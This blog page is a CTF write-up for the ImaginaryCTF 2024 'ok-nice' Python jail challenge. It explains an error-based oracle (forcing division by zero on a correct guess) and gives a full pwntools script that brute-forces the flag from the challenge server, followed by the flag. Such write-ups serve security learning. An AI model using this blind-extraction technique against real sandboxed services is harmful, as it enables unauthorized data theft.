<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>ok nice - ImaginaryCTF 2024 | shafouz blog</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="ok nice - ImaginaryCTF 2024" />
<meta name="author" content="shafouz" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="https://ctftime.org/event/2396" />
<meta property="og:description" content="https://ctftime.org/event/2396" />
<link rel="canonical" href="https://shafouz.github.io/2024/07/21/ok-nice.html" />
<meta property="og:url" content="https://shafouz.github.io/2024/07/21/ok-nice.html" />
<meta property="og:site_name" content="shafouz blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-07-21T04:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="ok nice - ImaginaryCTF 2024" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"shafouz"},"dateModified":"2024-07-21T04:00:00+00:00","datePublished":"2024-07-21T04:00:00+00:00","description":"https://ctftime.org/event/2396","headline":"ok nice - ImaginaryCTF 2024","mainEntityOfPage":{"@type":"WebPage","@id":"https://shafouz.github.io/2024/07/21/ok-nice.html"},"url":"https://shafouz.github.io/2024/07/21/ok-nice.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css"><link type="application/atom+xml" rel="alternate" href="https://shafouz.github.io/feed.xml" title="shafouz blog" />
<!-- Google tag (gtag.js) -->
  <script async src="https://www.googletagmanager.com/gtag/js?id=G-F6L4J94HSJ"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'G-F6L4J94HSJ');
  </script>
</head>
<body><header class="site-header">

  <div class="wrapper"><a class="site-title" rel="author" href="/">shafouz blog</a></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">ok nice - ImaginaryCTF 2024</h1>
    <p class="post-meta"><time class="dt-published" datetime="2024-07-21T04:00:00+00:00" itemprop="datePublished">
        Jul 21, 2024
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>https://ctftime.org/event/2396</p>

<h1 id="ok-nice-misc">ok-nice (misc)</h1>

<p>python jail</p>

<h2 id="solution">Solution</h2>

<p>Very limited range of options, nothing gets printed other than
<code class="language-plaintext highlighter-rouge">ok-nice</code> or <code class="language-plaintext highlighter-rouge">error</code>.</p>

<p>So the idea is to use the error as an oracle and brute force every char.</p>

<p>The main thing we are looking for is how to generate integers, so we can both index
flag and compare it to the result of ord.</p>

<p>Both <code class="language-plaintext highlighter-rouge">flag[True]</code> or <code class="language-plaintext highlighter-rouge">flag[False]</code> work.</p>

<p>True and False also work for generating integers:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">(</span><span class="bp">True</span> <span class="o">+</span> <span class="bp">True</span><span class="p">)</span> <span class="o">=</span> <span class="mi">2</span>
</code></pre></div></div>

<p>So now we can both index and compare two chars, something like:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">ord</span><span class="p">(</span><span class="n">flag</span><span class="p">[</span><span class="bp">True</span><span class="p">])</span> <span class="o">-</span> <span class="p">(</span><span class="bp">True</span><span class="o">+</span><span class="bp">True</span><span class="p">)</span> <span class="c1"># checks if flag[1] == '\x02'
</span></code></pre></div></div>

<p>Now we just need to throw an error whenever they match</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">True</span> <span class="o">/</span> <span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">flag</span><span class="p">[</span><span class="bp">True</span><span class="p">])</span> <span class="o">-</span> <span class="p">(</span><span class="bp">True</span><span class="o">+</span><span class="bp">True</span><span class="p">))</span> <span class="c1"># division by zero when they match
</span></code></pre></div></div>

<p>Then just loop through every idx and every char.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"ok-nice.chal.imaginaryctf.org"</span><span class="p">,</span> <span class="mi">1337</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">guess</span><span class="p">(</span><span class="n">char</span><span class="p">):</span>
    <span class="n">n</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n</span><span class="p">):</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">ret</span> <span class="o">+</span> <span class="s">"True+"</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">ret</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
    <span class="k">return</span> <span class="n">ret</span>

<span class="k">def</span> <span class="nf">get_idx</span><span class="p">(</span><span class="n">n</span><span class="p">):</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">ret</span> <span class="o">+</span> <span class="s">"True+"</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">ret</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
    <span class="k">return</span> <span class="n">ret</span>

<span class="k">def</span> <span class="nf">build_payload</span><span class="p">(</span><span class="n">guess</span><span class="p">,</span> <span class="n">idx</span><span class="p">):</span>
    <span class="k">return</span> <span class="sa">f</span><span class="s">"ord(flag[True])/((</span><span class="si">{</span><span class="n">guess</span><span class="si">}</span><span class="s">)-ord(flag[</span><span class="si">{</span><span class="n">idx</span><span class="si">}</span><span class="s">]))"</span>

<span class="kn">import</span> <span class="nn">string</span><span class="p">,</span> <span class="n">time</span>

<span class="n">chars</span> <span class="o">=</span> <span class="n">string</span><span class="p">.</span><span class="n">printable</span>

<span class="n">flag</span> <span class="o">=</span> <span class="s">""</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">100</span><span class="p">):</span>
    <span class="n">idx</span> <span class="o">=</span> <span class="n">get_idx</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">:</span>
        <span class="n">payload</span> <span class="o">=</span> <span class="n">build_payload</span><span class="p">(</span><span class="n">guess</span><span class="p">(</span><span class="n">char</span><span class="p">),</span> <span class="n">idx</span><span class="p">)</span>
        <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Enter input: "</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mf">0.100</span><span class="p">)</span>
        <span class="n">out</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>
        <span class="k">if</span> <span class="s">"error"</span> <span class="ow">in</span> <span class="n">out</span><span class="p">.</span><span class="n">decode</span><span class="p">():</span>
            <span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">+</span> <span class="n">char</span>
            <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"DEBUGPRINT[18]: go.py:45: flag=</span><span class="si">{</span><span class="n">flag</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>

<h2 id="flag">Flag</h2>
<p><code class="language-plaintext highlighter-rouge">ictf{0k_n1c3_7f4d3e5a6b}</code></p>

<p>shafouz 2024/07/21</p>

  </div><a class="u-url" href="/2024/07/21/ok-nice.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <div class="footer-col-wrapper">
      <div class="footer-col">
        <p class="feed-subscribe">
          <a href="https://shafouz.github.io/feed.xml">
            <svg class="svg-icon orange">
              <use xlink:href="/assets/minima-social-icons.svg#rss"></use>
            </svg><span>Subscribe</span>
          </a>
        </p>
        <ul class="contact-list">
          <li class="p-name">shafouz</li>
          <li><a class="u-email" href="mailto:jlmacedomatos@gmail.com">contact</a></li>
        </ul>
      </div>
      <div class="footer-col">
        <p></p>
      </div>
    </div>

    <div class="social-links"><ul class="social-media-list"><li>
  <a rel="me" href="https://hackerone.com/shafou" target="_blank" title="hackerone">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#hackerone"></use>
    </svg>
  </a>
</li>
<li>
  <a rel="me" href="https://github.com/shafouz" target="_blank" title="github">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#github"></use>
    </svg>
  </a>
</li>
<li>
  <a rel="me" href="https://twitter.com/shafouzzzzzz" target="_blank" title="twitter">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#twitter"></use>
    </svg>
  </a>
</li>
<li>
  <a rel="me" href="https://www.linkedin.com/in/joao-luca/" target="_blank" title="linkedin">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#linkedin"></use>
    </svg>
  </a>
</li>
</ul>
</div>

  </div>

</footer>
</body>

</html>
